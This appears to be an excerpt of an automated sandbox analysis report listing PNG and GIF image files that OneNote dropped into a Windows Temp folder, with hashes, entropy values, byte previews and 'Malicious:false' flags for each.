                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2B55F746-CF70-4BC6-8D87-4EB1BAF41179}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4081
                                                                                                                                                    Entropy (8bit):7.943373267196131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                    MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                    SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                    SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                    SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2BE2AE42-E830-4B6B-94A2-CFF047372A86}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17289
                                                                                                                                                    Entropy (8bit):7.962998633267186
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                    MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                    SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                    SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                    SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2CA96999-535B-4CAB-83DB-494328159237}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14553
                                                                                                                                                    Entropy (8bit):7.951135681293377
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                    MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                    SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                    SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                    SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2CBEF025-7A03-47E9-860E-47A4CC399F77}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2D111B9E-F79A-4647-B3FB-EAC9183F09A3}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2DC2D18A-2AE4-4E6E-9892-1808B65C78F3}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2E5666FF-E386-4C9B-8F06-84D165C87F76}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22634
                                                                                                                                                    Entropy (8bit):7.974332204835705
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                    MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                    SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                    SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                    SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2E6A69E8-64A0-4702-9194-3F1E59ADC584}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2EBB9041-6E91-42DE-90CF-889C70CC8950}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{3637C9C3-640D-4AC7-A7C8-926DF710FC58}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:GIF image data, version 89a, 1012 x 327
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11765
                                                                                                                                                    Entropy (8bit):7.911655818336033
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
                                                                                                                                                    MD5:B035F23C68CC9673E604FE5472F223D2
                                                                                                                                                    SHA1:56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
                                                                                                                                                    SHA-256:F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
                                                                                                                                                    SHA-512:B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:GIF89a..G.................................................................................................................................................................|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..|..~.................................................................................................................................................!.......,......G........H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{3E1590AC-8C97-4DAB-8BCF-0C4E8711749C}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{3E1E0AA9-3948-4D1D-AADD-BA4FFA111CCF}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{3E5E16D0-D9AF-4DB3-9BDC-D909D4138C11}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.950380155401321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                    MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                    SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                    SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                    SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                    Malicious:false
